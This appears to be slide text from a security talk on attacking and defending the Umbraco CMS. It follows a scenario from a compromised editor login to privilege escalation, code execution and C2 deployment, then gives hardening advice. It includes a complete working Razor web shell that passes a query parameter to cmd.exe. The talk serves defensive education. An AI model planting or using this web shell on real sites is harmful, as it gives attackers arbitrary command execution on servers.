🤬
Offensive Umbraco
Notes of a Friendly Adversary
Steven HarlandMe 👀
- Security Analyst @ Quorum Cyber
- Former Developer @ Intelligent Mobile
- Umbraco Expert, eJPT, OSCP, CRTP, OMG/WTF
❓❔
Offensive Security
What is Offensive Security? 🏹
- An adversarial approach to security
-
Simulating real-world attacks with the same tactics and techniques as real threat actors
- ...within agreed scope!
- End goal = better defences
Adversary Mindset 🧠
- How can I leverage [thing] for malicious purposes?
- Feature abuse/misuse
🤬
Offensive Umbraco
Demo Environment
Scenario
- You have compromised an Umbraco editor login
-
Your objectives are:
- Gain access to an admin account
- Deploy a C2 implant to the hosting server
Information Gathering 🔍
Information Gathering 🔍
- What role are we?
- What capabilities do we have?
- What data do we have access to?
- What version of Umbraco are we on?
- What packages are installed?
- How has the backoffice been extended?
- Can we deploy to other environments?
Enumeration: Backoffice Requests
Enumeration: Server Variables
Privilege Escalation 📈
Demo: Vulnerable Backoffice Extension 🚨
- PDF export feature
- PDF is generated from HTML template
- Editor has control over HTML
Code Execution 🚀
Code Execution 🚀
- Executing malicious code within the context of the target application
- In Umbraco this means C#/.NET and will require getting code into one of these locations:
- ~/bin/ (compiled)
- ~/Views/
- ~/App_Code/
- *.aspx
Code Execution 🚀
-
Trivial with an admin account
- Upload packages
- Create/edit views
-
Other possible methods:
- File upload exploitation: https://donutsec.fun/blog/ource/
- Supply chain attack
- Template injection
Command Execution 👨💻
- Executing commands on the underlying operating system
- We leverage code execution and features of the .NET Framework
Demo: Web Shell
@if (!string.IsNullOrEmpty(Request.QueryString["cmd"]))
{
try
{
using (var process = new System.Diagnostics.Process())
{
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments =
"/c " + Request.QueryString["cmd"];
process.StartInfo.CreateNoWindow = true;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;
process.Start();
var output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
<pre>@output</pre>
}
}
catch { }
}
Web Shell Issues 🤔
- Not exactly hidden from backoffice users
- View may be overwritten on deployment
-
Noisy
- Requires repeated HTTP requests to execute multiple commands
- Repeatedly spawns new server-side processes
- Query strings appear in IIS logs
Command & Control 🎮
Command & Control (C2)
C2 Frameworks 🏗️
- Cobalt Strike
- PowerShell Empire
- Covenant
- Apfell
- PoshC2
- ...
Demo: PoshC2 Deployment
Defence 🛡️
Backoffice features & permissions 🔏
- Use principle of least privilege
-
Carefully consider every feature you provide to editors
- You may be providing the same features to attackers
-
Apply adversary mindset to everything
- Treat everything as a potential route to compromise!
- Penetration testing/code reviews of backoffice extensions
File & folder permissions 📂
- Write access only for necessary folders to prevent executable files being written
- If template editing/package management in the backoffice is required then implement stricter controls in other areas
https://our.umbraco.com/Documentation/Fundamentals/Setup/Server-Setup/permissions
Application Pools 🥽
- Separate user for each website to prevent lateral movement
Defence in Depth 🥞
- Website front-end
- Backoffice login
- Backoffice features & permissions
- File & folder permissions
- Application pools
- Server
- Firewall
- ...
- You?
